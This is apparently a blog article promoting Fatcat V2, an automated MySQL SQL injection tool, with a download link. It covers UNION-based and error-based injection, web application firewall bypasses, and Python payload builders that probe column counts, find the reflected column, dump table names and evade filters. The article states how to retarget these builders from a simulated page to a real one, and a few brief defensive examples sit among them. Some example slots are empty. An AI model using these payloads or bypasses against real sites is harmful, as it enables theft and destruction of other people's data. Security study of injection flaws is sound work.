Fatcat V2 Auto [S]ql-Injector

March 29, 2013

Fatcat is an open source web application penetration testing tool, freely available for download. It was written to cut down the manual steps involved in exploiting a SQL injection vulnerability and to exploit such a vulnerability more thoroughly once it has been found.

Features of Fatcat V2

  • Supports normal (UNION-based) SQL injection
  • Supports error-based SQL injection
  • WAF (web application firewall) bypass:
    • C-style MySQL comment WAF bypass
    • "Buffer overflow" (request padding) WAF bypass
    • CRLF WAF bypass
    • Bypass using information_schema.statistics
    • Bypass using information_schema.key_column_usage
  • Runs on the widely used server platforms: Linux, Windows and Mac OS
  • Supports MySQL 5.0

Snapshot of Fatcat SQL Injector

To run the tool, provide the target URL, the vulnerable parameter, the maximum column count to probe, and select the injection type. To bypass a WAF, select one of the bypass methods from the list.

SQL injection brief

SQL injection is one of the most common vulnerabilities in PHP applications. A SQL injection vulnerability requires two failures on the part of the developer: a failure to filter data as it enters the application, and a failure to escape (or parameterise) data as it is passed from the application to the database.

If an attacker finds a parameter that is placed into a MySQL query without either of those protections, a payload such as the following can be appended to the parameter value:

; DROP TABLE clubhackParty-- -

When the application submits the resulting statement, the database drops the table clubhackParty: the injected text has become part of a valid SQL statement, and the trailing -- - comments out whatever the original query had after the injection point. Note that a stacked statement like this one only executes when the database driver accepts more than one statement per call; the UNION-based and error-based techniques that Fatcat automates do not depend on that.
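The two failures described above, shown side by side in code. This is an added example, not code from the article or from Fatcat; it uses Python's sqlite3 module so that it runs offline (the schema, table names and the two payloads are constructed for the example, and the concatenation bug is the same one a PHP script makes with MySQL). The vulnerable lookup glues the parameter into the statement and runs it through executescript(), which mimics a driver that accepts stacked statements; the safe lookup binds the value as a parameter.

```python
import sqlite3
from typing import Dict, List, Tuple

# Constructed schema standing in for the application's database. sqlite3 keeps
# the example runnable offline; the concatenation bug is the same in MySQL.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
        CREATE TABLE clubhackParty (id INTEGER PRIMARY KEY, guest TEXT);
        INSERT INTO clubhackParty VALUES (1, 'carol');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """Both failures named above: the parameter is not validated on the way in
    and is glued into the statement text instead of being passed as data."""
    query = f"SELECT username FROM users WHERE id = {user_id}"
    # executescript() runs every statement in the string, which is how a driver
    # that accepts stacked queries behaves (the '; DROP TABLE' payload needs
    # that). It returns no rows, so the first statement is re-run for the result.
    conn.executescript(query)
    return [row[0] for row in conn.execute(query.split(";")[0])]


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """Hardened form: fixed statement, value bound as a parameter. The database
    never parses attacker-controlled text as SQL, so the payloads below are
    just an id that matches nothing."""
    rows = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (name,),
    ).fetchone()
    return row[0] == 1


# The article's payload, appended to an otherwise valid id, plus a tautology.
DROP_PAYLOAD = "1; DROP TABLE clubhackParty-- -"
TAUTOLOGY_PAYLOAD = "1 OR 1=1"


def demo() -> Dict[str, Tuple[List[str], bool]]:
    """Run both payloads against both versions; return (rows, table still there)."""
    results = {}
    for label, lookup in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        conn = make_db()
        results[f"{label}_tautology"] = (lookup(conn, TAUTOLOGY_PAYLOAD),
                                         table_exists(conn, "clubhackParty"))
        results[f"{label}_drop"] = (lookup(conn, DROP_PAYLOAD),
                                    table_exists(conn, "clubhackParty"))
    return results


if __name__ == "__main__":
    for name, (rows, intact) in demo().items():
        print(f"{name:22s} rows={rows} clubhackParty_intact={intact}")
```

Against the vulnerable lookup the tautology returns every user and the stacked payload drops clubhackParty; against the parameterised lookup both payloads are compared to the integer id as an opaque string, match nothing, and the table survives.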

Fatcat Ingredient

Information Gathering Operation

For gathering information about a MySQL 5.0 database, Fatcat issues the following queries to harvest DB information.

*In the examples below, column 2 is assumed to be the vulnerable (reflected) column from which Fatcat extracts DB information and data. A "+" in the examples is a URL-encoded space, and "-- -" comments out the remainder of the original query.

    • To find the total number of columns the vulnerable query selects, Fatcat uses ORDER BY with an increasing column position: ORDER BY n succeeds while n is at most the number of columns in the query and fails as soon as it exceeds it, so the first failing value minus one is the column count.

Order by n+1

Fatcat then builds a valid SQL statement with the discovered number of columns, which looks like the following.

Example: Select+1, 2, 3+where+id=2+Order+by+1-- -

Note: this operation is at line 114 of dosql.php.

    • Fatcat uses the standard MySQL function to find the current MySQL version.

VERSION()

Example: Select+1, Version(), 3+where+id=2-- -

Note: the version lookup is at line 163 of dosql.php.

    • To fetch the current MySQL user name, Fatcat uses the following function.

User()

Example: Select+1, User(), 3+where+id=2-- -

Note: the User() lookup is at line 174 of dosql.php.

    • To find the data directory of the database server, Fatcat reads the following system variable.

@@datadir

Example: Select+1, @@datadir, 3+where+id=2-- -

Note: the @@datadir lookup is at line 182 of dosql.php.

    • To find the base (installation) directory of the database server, Fatcat reads the following system variable.

@@basedir

Example: Select+1, @@basedir, 3+where+id=2-- -

Note: the @@basedir lookup is at line 189 of dosql.php.

    • To find the host name of the database server, Fatcat reads the following system variable.

@@hostname

Example: Select+1, @@hostname, 3+where+id=2-- -

Note: the @@hostname lookup is at line 203 of dosql.php.

    • To find the operating system the MySQL server was compiled for, Fatcat reads the following system variable.

@@version_compile_os

Example: Select+1, @@version_compile_os, 3+where+id=2-- -

Note: the @@version_compile_os lookup is at line 209 of dosql.php.

    • To find the maximum packet size the server accepts, Fatcat reads the following system variable.

@@max_allowed_packet

Example: Select+1, @@max_allowed_packet, 3+where+id=2-- -

Note: the @@max_allowed_packet lookup is at line 196 of dosql.php.

    • To find the name of the current database, Fatcat uses the following SQL function.

Database()

Example: Select+1,database(), 3+where+id=2-- -

Note: the database() lookup is at line 159 of dosql.php.

Normal SQL injection Operation (Union select Injection)

Normal SQL injection is one of the main features of Fatcat. It combines the UNION and SELECT statements: UNION appends the result set of an attacker-controlled SELECT to the result set of the application's own query. It only works when one of the selected columns is rendered back in the page, like column 2 in the example above.

When you inject using normal SQL injection, Fatcat automatically identifies the vulnerable column and proceeds to exploit it.

Snapshot for normal SQL injection:

Enter the parameters to run a normal SQL injection and click "Inject It!". The normal SQL injection code starts at line 93 of dosql.php.

Example: SELECT username FROM Users_profile WHERE id = '-1' UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ),1,1024) FROM information_schema.columns--+';

Here the injected value starts with -1' so that the application's own WHERE clause matches nothing and only the UNION row is returned. The hex literals avoid quote characters: 0x3c62723e is "<br>", 0x5461626c653a20 is "Table: " and 0x436f6c756d6e3a20 is "Column: ", so GROUP_CONCAT produces an HTML-formatted list of every table and column name, and MID(...,1,1024) keeps the first 1024 characters of it (the default group_concat_max_len).
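The steps described in the information-gathering list and in this section, carried out against a simulated target. This is an added example, not Fatcat's code: the target page, its three-column query, the reflected column and the answers in FAKE_DB are all constructed for the example, standing in for the real server the tool would be pointed at. The functions show the ORDER BY column-count probe, the marker-based search for the reflected column, and the UNION payloads for each item the article lists.

```python
import re
from typing import Callable, Dict, List, Optional

# ---- Simulated target (constructed; stands in for the page Fatcat is aimed at) ----
# The page runs  SELECT title, body, author FROM posts WHERE id=<parameter>
# and renders only the second selected column, so "column 2 is vulnerable".
TARGET_COLUMNS = 3
REFLECTED_COLUMN = 2
FAKE_DB = {  # constructed answers for the expressions the article lists
    "version()": "5.0.96-community",
    "user()": "webapp@localhost",
    "database()": "clubhack_db",
    "@@datadir": "/var/lib/mysql/",
    "@@basedir": "/usr/",
    "@@hostname": "web01",
    "@@version_compile_os": "unknown-linux-gnu",
    "@@max_allowed_packet": "1048576",
}
WELCOME = "<html><p>Welcome to ClubHack</p></html>"


def simulated_target(param_value: str) -> str:
    """Return the 'page' the application would render for the injected value."""
    query = f"SELECT title, body, author FROM posts WHERE id={param_value}"
    m = re.search(r"ORDER BY (\d+)", query, re.I)
    if m:  # MySQL's reaction to ORDER BY n for n beyond the column count
        if int(m.group(1)) > TARGET_COLUMNS:
            return f"Unknown column '{m.group(1)}' in 'order clause'"
        return WELCOME
    m = re.search(r"UNION SELECT (.*?)-- -", query, re.I)
    if m:
        cols = [c.strip() for c in m.group(1).split(",")]
        if len(cols) != TARGET_COLUMNS:
            return "The used SELECT statements have a different number of columns"
        expr = cols[REFLECTED_COLUMN - 1]
        return f"<html><p>{FAKE_DB.get(expr.lower(), expr)}</p></html>"
    return WELCOME


# ---- The steps Fatcat automates ------------------------------------------------------
Sender = Callable[[str], str]


def find_column_count(send: Sender, max_columns: int = 50) -> int:
    """The 'Order by n+1' probe: ORDER BY n is accepted while n <= column count
    and rejected once it is larger, so the first rejected n minus one is the count.
    max_columns corresponds to the tool's 'Max column count' field."""
    for n in range(1, max_columns + 1):
        if "order clause" in send(f"1 ORDER BY {n}-- -").lower():
            return n - 1
    raise RuntimeError("column count exceeds max_columns")


def build_union_payload(ncols: int, column: int, expression: str) -> str:
    """-1 makes the original WHERE match nothing; the UNION supplies one row whose
    chosen column carries the expression and whose other columns are numbers."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[column - 1] = expression
    return "-1 UNION SELECT " + ",".join(cols) + "-- -"


def find_reflected_column(send: Sender, ncols: int) -> Optional[int]:
    """Send numeric markers 1..n and see which one shows up in the page but not
    in the untouched page. Real tools use longer, unique markers so that a stray
    digit in the page cannot be mistaken for the reflection."""
    baseline = send("1")
    page = send(build_union_payload(ncols, 1, "1"))  # plain 1,2,...,n
    for i in range(1, ncols + 1):
        if str(i) in page and str(i) not in baseline:
            return i
    return None


INFO_ITEMS: List[str] = ["version()", "user()", "database()", "@@datadir", "@@basedir",
                         "@@hostname", "@@version_compile_os", "@@max_allowed_packet"]


def gather_info(send: Sender, ncols: int, column: int) -> Dict[str, str]:
    """Ask for each item through the reflected column. The <p>...</p> extraction is
    specific to the simulated page; the article's real payload brackets values
    with hex markers (0x3c62723e = '<br>') for the same purpose."""
    results = {}
    for item in INFO_ITEMS:
        page = send(build_union_payload(ncols, column, item))
        m = re.search(r"<p>(.*?)</p>", page)
        results[item] = m.group(1) if m else ""
    return results


if __name__ == "__main__":
    n = find_column_count(simulated_target)
    col = find_reflected_column(simulated_target, n)
    print(f"columns={n} reflected_column={col}")
    for k, v in gather_info(simulated_target, n, col).items():
        print(f"{k:22s} {v}")
```

Pointing the same three functions at a real page only requires replacing simulated_target with a function that performs the HTTP request and returns the body; the error-string check in find_column_count and the value extraction in gather_info are the two places that have to be adapted to what the target actually prints.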

Error Based SQL injection Operation (Double Query Injection)

Error-based SQL injection is another main feature of Fatcat; it is also called double query injection. When UNION-based injection fails (for example because no column is reflected in the page), error-based injection can still retrieve database information.

Double query injection wraps a subquery that selects the wanted value inside an outer query constructed to make MySQL raise an error, and the error message that the application displays carries the value. The classic construction groups on a CONCAT of the wanted value and FLOOR(RAND(0)*2): the seeded RAND() produces a repeating sequence, the GROUP BY runs into the same key twice, and the server reports "Duplicate entry ... for key ..." with the concatenated value inside. That is enough to walk the database table by table and column by column, all the way to the admin credentials, or to dump it outright. Error-based injection needs fewer requests than blind injection, but because only one value fits into an error message there is no use for GROUP_CONCAT; values are pulled one at a time with CONCAT and LIMIT 0,1, LIMIT 1,1, and so on.

For example:

MySQL query:


Output:

Duplicate entry '~Clubhack_screte~1' for key 1

Here Clubhack_screte is the table name leaked through the error message; the ~ characters are markers placed around the value so it can be picked out of the message, and the trailing 1 is the FLOOR(RAND(0)*2) result.

The error-based SQL injection code starts at line 330 of dosql.php.

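The double query technique as a payload builder plus the LIMIT 0,1 / LIMIT 1,1 loop that walks the table list. This is an added example, not Fatcat's query (which is not reproduced on the page): the FLOOR(RAND(0)*2) / GROUP BY construction is the standard one, the ~ markers follow the output shown above, and the simulated target with its three table names is constructed for the example.

```python
import re
from typing import Callable, List, Optional

# Constructed table list standing in for information_schema.tables of the
# current database on the target.
FAKE_TABLES = ["Clubhack_screte", "users", "sessions"]


def double_query_payload(inner_select: str) -> str:
    """Wrap a scalar subquery in the FLOOR(RAND(0)*2) / GROUP BY construct.
    RAND(0) is seeded, so its floor sequence is the fixed 0,1,1,0,1,1,...; while
    grouping, MySQL evaluates the key once to look it up and again to insert it,
    gets a different value, and hits a duplicate in the temporary table. The
    error text then carries CONCAT(0x7e, value, 0x7e, 0|1)."""
    return ("-1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e, (" + inner_select +
            "), 0x7e, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)-- -")


DUPLICATE_RE = re.compile(r"Duplicate entry '~(.*?)~[01]' for key")


def parse_duplicate_entry(error_text: str) -> Optional[str]:
    """Pull the value back out of "Duplicate entry '~value~1' for key 1"."""
    m = DUPLICATE_RE.search(error_text)
    return m.group(1) if m else None


def table_name_subquery(row: int) -> str:
    """One table name per request: LIMIT 0,1, LIMIT 1,1, ... (no GROUP_CONCAT,
    because only one value fits into the error message)."""
    return ("SELECT table_name FROM information_schema.tables "
            f"WHERE table_schema=database() LIMIT {row},1")


def dump_tables(send: Callable[[str], str], max_rows: int = 100) -> List[str]:
    """Walk the table list row by row until the error stops appearing."""
    names = []
    for row in range(max_rows):
        leaked = parse_duplicate_entry(send(double_query_payload(table_name_subquery(row))))
        if leaked is None:
            break
        names.append(leaked)
    return names


def simulated_error_target(param_value: str) -> str:
    """Constructed stand-in for a page that prints MySQL errors. It 'evaluates'
    only the LIMIT clause of the wrapped subquery. Past the last table the real
    subquery yields NULL, CONCAT becomes NULL for every row, the key no longer
    varies and the duplicate does not occur; that is modelled as a normal page."""
    m = re.search(r"LIMIT (\d+),1", param_value)
    if m and int(m.group(1)) < len(FAKE_TABLES):
        return f"Duplicate entry '~{FAKE_TABLES[int(m.group(1))]}~1' for key 1"
    return "<html><p>No such post</p></html>"


if __name__ == "__main__":
    print(double_query_payload(table_name_subquery(0)))
    print(dump_tables(simulated_error_target))
```

Swapping table_name_subquery for a subquery over information_schema.columns (WHERE table_name=...) walks the columns of one table the same way; each request costs one round trip and yields one value, which is the trade-off against UNION injection that the text describes.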
WAF (Web Application Firewall) Bypass

According to OWASP, web application firewall (WAF) is an appliance, server plug-in, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Fatcat V2 lists the following as supported:

  • AppArmor
  • ModSecurity (also works under Mac OS X, Solaris and other versions of Unix)

Strictly, AppArmor is a Linux mandatory access control module rather than a web application firewall; ModSecurity is the WAF the bypass methods below are aimed at.

Fatcat V2 supports the following WAF bypass methods:

  • C-style comment WAF bypass
  • Buffer overflow WAF bypass
  • CRLF (CR = Carriage Return, LF = Line Feed) WAF bypass
  • WAF bypass using information_schema.statistics
  • WAF bypass using information_schema.key_column_usage

Brief Description:

1. C-style MySQL comment WAF bypass

  • A statement written as /*!MysqlQuery*/ is a MySQL "executable comment" (a C-style comment with a leading exclamation mark).
  • MySQL executes the SQL inside such a comment; other SQL servers, and most signature-based filters, treat it as a comment and ignore the content. An optional version number, as in /*!50000select*/, makes MySQL execute the content only on that version or newer.
  • When the query is sent, the MySQL server parses the comment body as part of the query and executes it, while a WAF looking for a plain "union select" sees nothing to block.

Example:

(The highlighted portion of the screenshot is the C-style comment WAF bypass.)

2. Buffer overflow WAF bypass

  • In the memory-corruption sense, a buffer overflow alters the flow of a program by overwriting adjacent memory when the data written into a buffer exceeds its size. That is not what happens here; the name is borrowed.
  • In the SQL injection sense, the "buffer overflow" bypass means padding the request with a large amount of harmless data (for instance a very long hex literal inside an always-false comparison) so that the injected UNION SELECT lies beyond the number of bytes the WAF inspects in each parameter. The database still parses the whole query; the WAF only saw the padding.

Example:

3. CRLF (CR = Carriage Return, LF = Line Feed) WAF bypass

  • CRLF (carriage return and line feed, %0D%0A when URL-encoded) is a line-ending sequence that MySQL treats as ordinary whitespace between tokens.
  • Replacing the spaces in a payload with CR/LF characters, e.g. UNION%0D%0ASELECT, leaves the query valid for MySQL.
  • A WAF whose signatures expect a literal space between "union" and "select" does not match the CR/LF-separated version and lets it through; signatures written with a whitespace class (\s) do catch it.

Example:

4. Some WAFs block specific keywords such as information_schema.tables and information_schema.columns. The following information_schema tables also expose table and column names and can be used instead.

  • information_schema.statistics

This table holds one row per indexed column (table_schema, table_name, index_name, column_name), so it lists the tables and columns of every index. Tables that have no index at all do not appear in it.

Example:

(The highlighted part of the screenshot shows the use of information_schema.statistics in Fatcat.)

  • information_schema.key_column_usage

The KEY_COLUMN_USAGE table describes which key columns have constraints (PRIMARY KEY, UNIQUE and FOREIGN KEY), again with table_schema, table_name and column_name; columns that are not part of any key constraint are not listed.

Example:

(The highlighted part of the screenshot shows the use of information_schema.key_column_usage in Fatcat.)

The latest version of Fatcat can be downloaded from the following link.

https://dl.dropbox.com/u/18007092/FatCat%20V2%20-%20SandeepKamble.com.zip
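The four bypass methods from the WAF section, made concrete against a deliberately weak filter. This is an added example, not Fatcat's code and not ModSecurity: the toy WAF (its two signatures, its literal-space matching and its 256-byte inspection window) is constructed to exhibit exactly the weaknesses each bypass relies on, the transforms are this example's own implementation of the techniques the article names, and a hardened check is included to show what closes the first three bypasses.

```python
import re

# ---- Toy WAF (constructed for this example; it is not ModSecurity) -----------------
# Two weaknesses the bypasses below exploit are built in deliberately:
#   1. signatures match a literal space, not any whitespace;
#   2. only the first INSPECT_BYTES of a parameter value are inspected.
INSPECT_BYTES = 256
SIGNATURES = [
    r"union[ ]+select",
    r"information_schema\.(tables|columns)",
]


def naive_waf_blocks(value: str) -> bool:
    """True when the toy WAF would reject the (URL-decoded) parameter value."""
    window = value[:INSPECT_BYTES]
    return any(re.search(sig, window, re.I) for sig in SIGNATURES)


def hardened_waf_blocks(value: str) -> bool:
    """What the filter should do instead: unwrap /*!...*/ executable comments,
    collapse all whitespace, and inspect the whole value rather than a prefix."""
    norm = re.sub(r"/\*!\d*(.*?)\*/", r"\1", value, flags=re.S)
    norm = re.sub(r"\s+", " ", norm)
    return any(re.search(sig, norm, re.I) for sig in SIGNATURES)


# ---- Bypass transforms ---------------------------------------------------------------
UNION_TAIL = "UNION SELECT 1,version(),3-- -"
BASE_PAYLOAD = "-1 " + UNION_TAIL


def c_style_comments(payload: str) -> str:
    """Wrap keywords in /*!...*/: MySQL executes the content, while a signature
    that wants 'union select' with a space between them no longer matches."""
    return re.sub(r"\b(union|select|from|where)\b", r"/*!\1*/", payload, flags=re.I)


def crlf_whitespace(payload: str) -> str:
    """Replace the spaces between words with CR LF (sent as %0D%0A). MySQL treats
    both as whitespace. Spaces next to punctuation, e.g. in the '-- -' comment
    terminator, are left alone so the comment still closes the statement."""
    return re.sub(r"(?<=\w) (?=\w)", "\r\n", payload)


def buffer_padding(union_tail: str, size: int = 1000) -> str:
    """Push the UNION past the inspected prefix. The padding is a long hex literal
    in a comparison that is always false, so the original WHERE matches nothing
    and only the UNION row comes back."""
    filler = "0x" + "41" * size
    return f"1 AND (SELECT 1)=(SELECT {filler}) {union_tail}"


# ---- Schema sources that avoid the blocked names --------------------------------------
def statistics_query() -> str:
    """One row per indexed column; tables without any index are missing."""
    return ("SELECT CONCAT(table_name,0x3a,column_name) FROM information_schema.statistics "
            "WHERE table_schema=database()")


def key_column_usage_query() -> str:
    """One row per column in a PRIMARY/UNIQUE/FOREIGN KEY constraint; columns
    outside any key constraint are missing."""
    return ("SELECT CONCAT(table_name,0x3a,column_name) FROM information_schema.key_column_usage "
            "WHERE table_schema=database()")


def schema_payload(query: str, row: int) -> str:
    """Put one row of a schema query into the reflected column, keywords wrapped."""
    return c_style_comments(f"-1 UNION SELECT 1,({query} LIMIT {row},1),3-- -")


if __name__ == "__main__":
    candidates = {
        "plain": BASE_PAYLOAD,
        "c_style": c_style_comments(BASE_PAYLOAD),
        "crlf": crlf_whitespace(BASE_PAYLOAD),
        "padding": buffer_padding(UNION_TAIL),
        "tables": "-1 UNION SELECT 1,table_name,3 FROM information_schema.tables-- -",
        "statistics": schema_payload(statistics_query(), 0),
    }
    for name, p in candidates.items():
        print(f"{name:11s} naive_blocks={naive_waf_blocks(p)!s:5} "
              f"hardened_blocks={hardened_waf_blocks(p)}")
```

The hardened check catches the comment, CRLF and padding variants because all three leave the keywords intact once the value is normalised and read in full; the information_schema.statistics and key_column_usage alternatives are a different matter, since they change which names appear in the query, and a filter that lists only .tables and .columns will miss them whatever its parsing does.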

Thank you for reading

 
